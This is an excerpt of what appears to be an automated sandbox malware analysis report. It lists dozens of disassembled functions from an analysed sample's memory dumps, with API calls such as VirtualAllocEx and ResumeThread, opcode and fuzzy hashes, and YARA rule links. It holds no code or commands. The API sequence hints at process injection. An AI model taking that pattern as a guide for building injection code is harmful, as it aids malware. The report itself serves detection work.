                                                • Instruction ID: 377e56a0e4ef77e3969bf5d3da860ba4ab068f61be75b86cf482ade14bcf0345
                                                • Opcode Fuzzy Hash: 47dadd709102e97ce462c8015da334be9a9195880f64efcb7def140667e13d69
                                                • Instruction Fuzzy Hash: 752128B19002599FCB10DFAAC885BEEFBF5FF48320F10842AE558A7250C7349954DBA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00FAD5C0 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                Download Yara Rule
                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00FAD647
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1733610804.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_fa0000_gunzipped.jbxd
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: 29e1b199fcd99814a2f7f5a179194fbcbeff224eb552d673348b9e2e259781cb
                                                • Instruction ID: 3413bbc7a7dba214d99b8b2cdd05a459c6538f561f217a8a76053af9777f2cc8
                                                • Opcode Fuzzy Hash: 29e1b199fcd99814a2f7f5a179194fbcbeff224eb552d673348b9e2e259781cb
                                                • Instruction Fuzzy Hash: 2221E2B59002089FDB10CFAAD984ADEBBF8EB48320F14801AE918A3350C374A940CFA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0772F799 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0772F80E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1739617348.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7720000_gunzipped.jbxd
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                • Opcode ID: ee62466f2da31c25207cc74dc71826df4e5b439322c47b63379204a691b2de98
                                                • Instruction ID: 8170f38c297f29e67103db466ef55331e1af4f2a77159848702e3bc851985834
                                                • Opcode Fuzzy Hash: ee62466f2da31c25207cc74dc71826df4e5b439322c47b63379204a691b2de98
                                                • Instruction Fuzzy Hash: BB1147B29002599FCB20DFAAC845BDFFFF5EB48324F108829E559A7250CB35A550CFA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00FAA0A8 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00FAAFB9,00000800,00000000,00000000), ref: 00FAB1CA
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1733610804.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_fa0000_gunzipped.jbxd
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                • Opcode ID: 5164ea6b05ae495a0f222ccef51dae11433133c68874f0aefc4aca2120e556e3
                                                • Instruction ID: 64716a742a13f3a9bb519b0ccff369a4190e62f8d4130764d0488ecb75c74e58
                                                • Opcode Fuzzy Hash: 5164ea6b05ae495a0f222ccef51dae11433133c68874f0aefc4aca2120e556e3
                                                • Instruction Fuzzy Hash: 461103B69003098FDB10CF9AC848B9EFBF4EB49320F10842AE419A7211C375A945CFA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00FAB159 Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00FAAFB9,00000800,00000000,00000000), ref: 00FAB1CA
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1733610804.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_fa0000_gunzipped.jbxd
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                • Opcode ID: 5b661e051a704fc05def9cd28c87ed39f77054dfdff55c6fa77cb0ea00341065
                                                • Instruction ID: fc7d8067dcb02a17a1e9011940dd627121d3f1b64d0d895ac041d399bc1630c6
                                                • Opcode Fuzzy Hash: 5b661e051a704fc05def9cd28c87ed39f77054dfdff55c6fa77cb0ea00341065
                                                • Instruction Fuzzy Hash: 1E1114B6D002498FDB10CF9AC845ADEFBF4EB49320F10842ED459A7311C375A545CFA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0772F7A0 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0772F80E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1739617348.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7720000_gunzipped.jbxd
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                • Opcode ID: 3fce0f3dc4a48abbe0dad8e2e33987c42bd09f2113e4f2d705270d7c66b49b30
                                                • Instruction ID: 1d3a96251d00a4112a6949d52989bf85b7e67c551cd37b3777ab87b06f67425c
                                                • Opcode Fuzzy Hash: 3fce0f3dc4a48abbe0dad8e2e33987c42bd09f2113e4f2d705270d7c66b49b30
                                                • Instruction Fuzzy Hash: DE1156B29002499FCB10DFAAC845BDEFBF5EB88320F108829E519A7250CB35A540CFA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0772F612 Relevance: 1.6, APIs: 1, Instructions: 51threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1739617348.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7720000_gunzipped.jbxd
                                                Similarity
                                                • API ID: ResumeThread
                                                • String ID:
                                                • API String ID: 947044025-0
                                                • Opcode ID: 9f7827f65c73e8b0168427821dcf8904842860a19581ce55dec9802167278753
                                                • Instruction ID: c2dc5554e07d1eec80366c1ef238c1ce6d9805e5f06aa33cf8539641bd37bcaa
                                                • Opcode Fuzzy Hash: 9f7827f65c73e8b0168427821dcf8904842860a19581ce55dec9802167278753
                                                • Instruction Fuzzy Hash: 1D1158B19003588BCB20DFAAC4457DEFBF5EB88324F208429D419A7250CB35A944CBA8
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0772F618 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1739617348.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7720000_gunzipped.jbxd
                                                Similarity
                                                • API ID: ResumeThread
                                                • String ID:
                                                • API String ID: 947044025-0
                                                • Opcode ID: 5452b0d75715e4ced0a379f5e3caca1c85fef256ee874c4b897868125f273809
                                                • Instruction ID: f661d9a08580cf287d9288fa654ee48ff06ba688978fb35ba5a574146f7e0317
                                                • Opcode Fuzzy Hash: 5452b0d75715e4ced0a379f5e3caca1c85fef256ee874c4b897868125f273809
                                                • Instruction Fuzzy Hash: 881136B1D003598FDB20DFAAC4457DEFBF5EB88324F208829D459A7250CB75A944CFA8
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00FAAED8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 00FAAF3E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1733610804.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_fa0000_gunzipped.jbxd
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: c791671fd4b97c3e45d80aa358d4447dba3cdb644141f04a3829de155f1c0fe6
                                                • Instruction ID: 87a666c1ecce63783ddf3f2559878e5cda3a5327239874a8b15f85589174948a
                                                • Opcode Fuzzy Hash: c791671fd4b97c3e45d80aa358d4447dba3cdb644141f04a3829de155f1c0fe6
                                                • Instruction Fuzzy Hash: 0C1110B6C002498FCB14CF9AD444BDEFBF4AB88324F10842AD818A7210C379A549CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 052E4CEC Relevance: 1.4, Strings: 1, Instructions: 128COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1736993285.00000000052E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_52e0000_gunzipped.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Hbq
                                                • API String ID: 0-1245868
                                                • Opcode ID: 396977285967876d7f8daa31aa56930dfcd483c03f5873a4875d19975a26cb7a
                                                • Instruction ID: 3c14bee561b0daaa27ff5d34ae8514138a49a26f65de0608ad656efbd3755fbe
                                                • Opcode Fuzzy Hash: 396977285967876d7f8daa31aa56930dfcd483c03f5873a4875d19975a26cb7a
                                                • Instruction Fuzzy Hash: 4F416DB5A003189FCB14DFA9D444AAEBBF6FF98310F108429E40AE7750DB35A945CBA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 052E436C Relevance: 1.3, Strings: 1, Instructions: 99COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1736993285.00000000052E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_52e0000_gunzipped.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: F#Y
                                                • API String ID: 0-659076689
                                                • Opcode ID: ed4e17ff49aee3abe91bb3611bf263c8cbbcb4ee582e0428618af470408eac85
                                                • Instruction ID: 4d5feef54e89372f6bf78eecb4a532f08e034f98091e666aea629943efd705b7
                                                • Opcode Fuzzy Hash: ed4e17ff49aee3abe91bb3611bf263c8cbbcb4ee582e0428618af470408eac85
                                                • Instruction Fuzzy Hash: D441C2B1D10209DBDB24DFA9C584ADDFFB5BF48314F648029D409BB214D7756A46CF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 052E53F4 Relevance: 1.3, Strings: 1, Instructions: 99COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1736993285.00000000052E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_52e0000_gunzipped.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: F#Y
                                                • API String ID: 0-659076689
                                                • Opcode ID: 103a8ef699a3c423b267f4c4d88e617076e8664a104d68486fba08aba08c231c
                                                • Instruction ID: 3823c3b971cd4f83f888f1fdc0ad2700f6199dbc2843b2a7611bde1af910c7c2
                                                • Opcode Fuzzy Hash: 103a8ef699a3c423b267f4c4d88e617076e8664a104d68486fba08aba08c231c
                                                • Instruction Fuzzy Hash: 6C41E1B1D11209CBDB24DFA9C984ADEFFB5BF48304F648029D408BB255E7756A46CF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 052E52F8 Relevance: 1.3, Strings: 1, Instructions: 79COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1736993285.00000000052E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_52e0000_gunzipped.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: F#Y
                                                • API String ID: 0-659076689
                                                • Opcode ID: 1359e6ea8b62eb1c660772e4af6c072d5c4b9ac66e4de08a640e5c0be37619a6
                                                • Instruction ID: 4cb6824a7fe8800e8f380313963b0b35c2bad9b6ef5b95902c1e261eabcec8cb
                                                • Opcode Fuzzy Hash: 1359e6ea8b62eb1c660772e4af6c072d5c4b9ac66e4de08a640e5c0be37619a6
                                                • Instruction Fuzzy Hash: 62210771B102058FC704EF78E4495AEBBF2EF84314B5589A9E106DB351EF74ED058B90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 052E52E8 Relevance: 1.3, Strings: 1, Instructions: 60COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1736993285.00000000052E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_52e0000_gunzipped.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: F#Y
                                                • API String ID: 0-659076689
                                                • Opcode ID: eab27b5e2d9dd2b05b8cc65bdfa3c617e4a550a441cecee83b949811c92a4fad
                                                • Instruction ID: 27e269689cda645b280089739411d5105852d534a06f21efa0acb73edc90d73f
                                                • Opcode Fuzzy Hash: eab27b5e2d9dd2b05b8cc65bdfa3c617e4a550a441cecee83b949811c92a4fad
                                                • Instruction Fuzzy Hash: A611E4B17102058FCB14EF78D9495AEB7F6EF80304B1189A9D506DB355EB74ED048B90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 052EB910 Relevance: .7, Instructions: 728COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1736993285.00000000052E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_52e0000_gunzipped.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3123e1f881047c8eacd9567520ddef32205e57040a9eb3e02a5dceaf116b275b
                                                • Instruction ID: e23d3a7719f4a76a7981e958a527998ff77cd7e48c084038f281e89d35eed43d
                                                • Opcode Fuzzy Hash: 3123e1f881047c8eacd9567520ddef32205e57040a9eb3e02a5dceaf116b275b
                                                • Instruction Fuzzy Hash: 62726131910609CFCB15EF68D898AEDBBB1FF55300F418299D949A7265EF30AAC5CF81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 052E8890 Relevance: .6, Instructions: 551COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1736993285.00000000052E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_52e0000_gunzipped.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2ab05d01ce79a11115ae54ac5d6c9b8d639cc488f39dfe44987df6f3d3dfff0a
                                                • Instruction ID: ed3a9b06f2e75a4334827176a4298132cd096b7500b36ff5b0595ff7497c70df
                                                • Opcode Fuzzy Hash: 2ab05d01ce79a11115ae54ac5d6c9b8d639cc488f39dfe44987df6f3d3dfff0a
                                                • Instruction Fuzzy Hash: FA42D931E2061ACFCB15DF68C8946EDF7B2BF89300F518699D459B7261EB70AA85CF40
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 052ED5A8 Relevance: .5, Instructions: 500COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1736993285.00000000052E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_52e0000_gunzipped.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 31e4acd8050ea0aa34956da4f5587126ccfc68ad35acda371579d701ad69cdbb
                                                • Instruction ID: 8ed89f0094065579a24e5a809e5ef826ff999b64046345e7ed31a0e0a66ad90c
                                                • Opcode Fuzzy Hash: 31e4acd8050ea0aa34956da4f5587126ccfc68ad35acda371579d701ad69cdbb
                                                • Instruction Fuzzy Hash: 12222934A20215CFCB14DF68C898B9DB7B2BF89300F5485A9D41AAB3A5DB71AD85CF50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 052E8881 Relevance: .3, Instructions: 329COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1736993285.00000000052E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_52e0000_gunzipped.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4b037f45931c772f4fc5ca2a9642fe41a09fd8ad82efb6d74c461ffb0920b4f4
                                                • Instruction ID: ee55d23cd634fc34c0229472bbdc4e66c00b33421b3c8222fba6940c51d472af
                                                • Opcode Fuzzy Hash: 4b037f45931c772f4fc5ca2a9642fe41a09fd8ad82efb6d74c461ffb0920b4f4
                                                • Instruction Fuzzy Hash: 0DE1F931E206198FCB25DF68C8846EDB7B2BF49300F5186A9D459BB351EB70AA81CF40
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 052ED1E0 Relevance: .3, Instructions: 268COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1736993285.00000000052E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_52e0000_gunzipped.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0ee82bd0021d050fba3cb3a6651d11a0ed7fee3767d27f13dcf5aa8d69accac0
                                                • Instruction ID: 4103520074057dc1a7a43b809f1327dd606c0ba48f095af965980fcddf7a1008
                                                • Opcode Fuzzy Hash: 0ee82bd0021d050fba3cb3a6651d11a0ed7fee3767d27f13dcf5aa8d69accac0
                                                • Instruction Fuzzy Hash: 41C10834A1061ACFCB14DF69C884A9DF7B2FF89304F5586A9D449AB261EB70ED85CF40
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 052ED1D0 Relevance: .2, Instructions: 212COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1736993285.00000000052E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_52e0000_gunzipped.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ebf603f85b8d308bbf13424e2feaa5295552a6e3642bece51cc659a14c7432fe
                                                • Instruction ID: e8613d741967f6c92a64764176b0584e6f68c4a0402279fa8ab36dd84341ee3b
                                                • Opcode Fuzzy Hash: ebf603f85b8d308bbf13424e2feaa5295552a6e3642bece51cc659a14c7432fe
                                                • Instruction Fuzzy Hash: 29A1E635E1061ACFCB14DF68C884A9DB7B1FF89304F5586A9D449AB261EB70AE85CF40
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 052EEB70 Relevance: .2, Instructions: 208COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1736993285.00000000052E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_52e0000_gunzipped.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e83f48d962bea11af62fd32369341595d15e08d1f6ef0e4f9e35aeb868fc58cf
                                                • Instruction ID: 8ccbd591ba11491a9035c5c8300da826b67ae3166c005c778b21050b2eeb1ad2
                                                • Opcode Fuzzy Hash: e83f48d962bea11af62fd32369341595d15e08d1f6ef0e4f9e35aeb868fc58cf
                                                • Instruction Fuzzy Hash: 78816130A20219CFCB04DBE8C884AEDB7B6FF88300F558565D50AAB359DBB4AD45CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 052EB2A0 Relevance: .2, Instructions: 197COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1736993285.00000000052E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_52e0000_gunzipped.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d94ea09b7172d3997e6130a3dfe7fc2d50bf1f4c17181b145c9776b10d7b0298
                                                • Instruction ID: d159561eba1eb9146cbf74ded5dbc120cdf15cbf8531b058a8e59e36c4c0c89b
                                                • Opcode Fuzzy Hash: d94ea09b7172d3997e6130a3dfe7fc2d50bf1f4c17181b145c9776b10d7b0298
                                                • Instruction Fuzzy Hash: 4291087591060ACFCB01DF68D884999FBF5FF49320B14879AE819AB255EB70E985CF80
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 052EA621 Relevance: .2, Instructions: 178COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1736993285.00000000052E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_52e0000_gunzipped.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1ed523d1f12b9d399f06e127e87d5e833b434a79ba4caa144418e32250084be0
                                                • Instruction ID: 93f954130760ee86ac1c2c33b24e2c38e565be12e4772fb3ed18875ab800700b
                                                • Opcode Fuzzy Hash: 1ed523d1f12b9d399f06e127e87d5e833b434a79ba4caa144418e32250084be0
                                                • Instruction Fuzzy Hash: 8E71BDB9600A008FCB18DF29C588959BBF2BF8931471589A9E54ACB372DB71EC45CB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 052EA440 Relevance: .2, Instructions: 172COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1736993285.00000000052E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_52e0000_gunzipped.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: db4131eda039fa6db33e87eb0e4a0d667544eb1e8ef9baba6198c2768d3fa2ba
                                                • Instruction ID: 055771249d50b6b9e693270fd674fb062a6175d9b95d2c048c1ae7577fadae14
                                                • Opcode Fuzzy Hash: db4131eda039fa6db33e87eb0e4a0d667544eb1e8ef9baba6198c2768d3fa2ba
                                                • Instruction Fuzzy Hash: EC71B278A142068FCB04CF69D584999FBF1BF49310B5986A9E80ADB352D734EC85CF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 052EEB60 Relevance: .2, Instructions: 166COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1736993285.00000000052E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_52e0000_gunzipped.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: dbe6908124213e170df82c8447d9b2039d71158d7e428fb57f6705c8a48254c6
                                                • Instruction ID: 0b117d4a978789632ea9928ead4ee113c07965e8001b9fcd79ba3629f65c34c1
                                                • Opcode Fuzzy Hash: dbe6908124213e170df82c8447d9b2039d71158d7e428fb57f6705c8a48254c6
                                                • Instruction Fuzzy Hash: D0613E31A202198FCB04DBD4D984AEDB7B6FF88300F968665D40A7B359DBB4A945CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 052ED598 Relevance: .2, Instructions: 163COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1736993285.00000000052E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_52e0000_gunzipped.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 756dc96dcf2754b0596485646c61daed947eb809e73069fa50b633f1965f29c4
                                                • Instruction ID: 6e8bd36874e1feab55391850153e0158165ea60c7f6323b6b483055b84e5b8ef
                                                • Opcode Fuzzy Hash: 756dc96dcf2754b0596485646c61daed947eb809e73069fa50b633f1965f29c4
                                                • Instruction Fuzzy Hash: 57515A307202008FCB14DF69C898B9DB7F2BF89310F548ABCD55A9B3A5DB71E8498B50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 052E4330 Relevance: .2, Instructions: 154COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1736993285.00000000052E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_52e0000_gunzipped.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 486a8bca86e6cc117587780aecfe41265a65062e02c82d6f9c7123bfa2761c60
                                                • Instruction ID: ec0b71a5904f19b370520d43ba8cee11db14d25504e8141330cca738b9c80f64
                                                • Opcode Fuzzy Hash: 486a8bca86e6cc117587780aecfe41265a65062e02c82d6f9c7123bfa2761c60
                                                • Instruction Fuzzy Hash: 3C515F71F102559FCF14DFA9D948AAFBBF5EF88310F50842AE415E7250DB7499018B90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 052EB291 Relevance: .1, Instructions: 146COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1736993285.00000000052E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_52e0000_gunzipped.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2c9ec836d4591ec497818ff68b06ead7073a0649ae9b2e70a8e28d71945bb3a6
                                                • Instruction ID: d34912c4c4c474fde4ae7f50fbc184a5015a15b49b320524308a9ecc1d54b4f8
                                                • Opcode Fuzzy Hash: 2c9ec836d4591ec497818ff68b06ead7073a0649ae9b2e70a8e28d71945bb3a6
                                                • Instruction Fuzzy Hash: 1F512A71D1070ACFCB01DFA8C884999FBB1FF49320B148756E819EB255EB70E985CB80
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 052E4D24 Relevance: .1, Instructions: 130COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1736993285.00000000052E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_52e0000_gunzipped.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f8d3e25f725f5caf558698ec278775cf77bb5f557ab3bbe25151e3e28d89b564
                                                • Instruction ID: 9df99cf841c6e0825a1e10c2f323f59a8b25cb299fb6c141a601f5abd155cfa6
                                                • Opcode Fuzzy Hash: f8d3e25f725f5caf558698ec278775cf77bb5f557ab3bbe25151e3e28d89b564
                                                • Instruction Fuzzy Hash: 9731C030A22218DFCF14EFA4E5985ADFBB2FF85301F518469E45277391CB31A865CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 052E1220 Relevance: .1, Instructions: 124COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1736993285.00000000052E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_52e0000_gunzipped.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 27ee85d74c81d8e123b55336fe5a6cad3caabc46a3cf82f0aca0194eb6a1c677
                                                • Instruction ID: a470fc03e18c55daf09835c9f6486b6b6d157221bb1ebf5f41dfd383c568789d
                                                • Opcode Fuzzy Hash: 27ee85d74c81d8e123b55336fe5a6cad3caabc46a3cf82f0aca0194eb6a1c677
                                                • Instruction Fuzzy Hash: 26416A35E2022ACFDF15DFB9E854AADBBB1BF88320F544125D809E7354DB709981CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 052E0040 Relevance: .1, Instructions: 112COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1736993285.00000000052E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_52e0000_gunzipped.jbxd
                                                Similarity
                                                • API ID:
